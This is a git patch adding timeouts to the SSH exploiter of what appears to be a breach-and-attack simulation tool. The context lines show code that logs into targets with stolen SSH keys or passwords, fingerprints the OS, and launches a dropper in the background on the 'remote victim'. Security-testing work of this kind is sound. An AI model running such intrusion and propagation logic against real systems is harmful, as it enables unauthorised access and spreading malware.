From e3e038bf40fcc9b38134934658ba706a83718f51 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Thu, 17 Mar 2022 16:50:26 +0100
Subject: [PATCH] Agent: Add timeouts to SSH exploit

---
 monkey/infection_monkey/exploit/sshexec.py | 30 +++++++++++++++++++---
 1 file changed, 26 insertions(+), 4 deletions(-)

diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py
index d39e910bc..0410b95d8 100644
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@@ -3,6 +3,7 @@ import logging
 
 import paramiko
 
+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
 from common.utils.attack_utils import ScanStatus
 from common.utils.exceptions import FailedExploitationError
 from infection_monkey.exploit.HostExploiter import HostExploiter
@@ -18,6 +19,11 @@ from infection_monkey.utils.timer import Timer
 
 logger = logging.getLogger(__name__)
 SSH_PORT = 22
+SSH_CONNECT_TIMEOUT = LONG_REQUEST_TIMEOUT
+SSH_AUTH_TIMEOUT = LONG_REQUEST_TIMEOUT
+SSH_BANNER_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
+SSH_EXEC_TIMEOUT = LONG_REQUEST_TIMEOUT
+
 TRANSFER_UPDATE_RATE = 15
 
 
@@ -61,7 +67,15 @@ class SSHExploiter(HostExploiter):
             except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
                 logger.error("Failed reading ssh key")
             try:
-                ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
+                ssh.connect(
+                    self.host.ip_addr,
+                    username=user,
+                    pkey=pkey,
+                    port=port,
+                    timeout=SSH_CONNECT_TIMEOUT,
+                    auth_timeout=SSH_AUTH_TIMEOUT,
+                    banner_timeout=SSH_BANNER_TIMEOUT,
+                )
                 logger.debug(
                     "Successfully logged in %s using %s users private key", self.host, ssh_string
                 )
@@ -96,7 +110,15 @@ class SSHExploiter(HostExploiter):
             ssh = paramiko.SSHClient()
             ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
-                ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port)
+                ssh.connect(
+                    self.host.ip_addr,
+                    username=user,
+                    password=current_password,
+                    port=port,
+                    timeout=SSH_CONNECT_TIMEOUT,
+                    auth_timeout=SSH_AUTH_TIMEOUT,
+                    banner_timeout=SSH_BANNER_TIMEOUT,
+                )
 
                 logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user)
                 self.add_vuln_port(port)
@@ -147,7 +169,7 @@ class SSHExploiter(HostExploiter):
 
         if not self.host.os.get("type"):
             try:
-                _, stdout, _ = ssh.exec_command("uname -o")
+                _, stdout, _ = ssh.exec_command("uname -o", timeout=SSH_EXEC_TIMEOUT)
                 uname_os = stdout.read().lower().strip().decode()
                 if "linux" in uname_os:
                     self.exploit_result.os = "linux"
@@ -214,7 +236,7 @@ class SSHExploiter(HostExploiter):
             cmdline = "%s %s" % (self.options["dropper_target_path_linux"], MONKEY_ARG)
             cmdline += build_monkey_commandline(self.host, self.current_depth - 1)
             cmdline += " > /dev/null 2>&1 &"
-            ssh.exec_command(cmdline)
+            ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)
 
             logger.info(
                 "Executed monkey '%s' on remote victim %r (cmdline=%r)",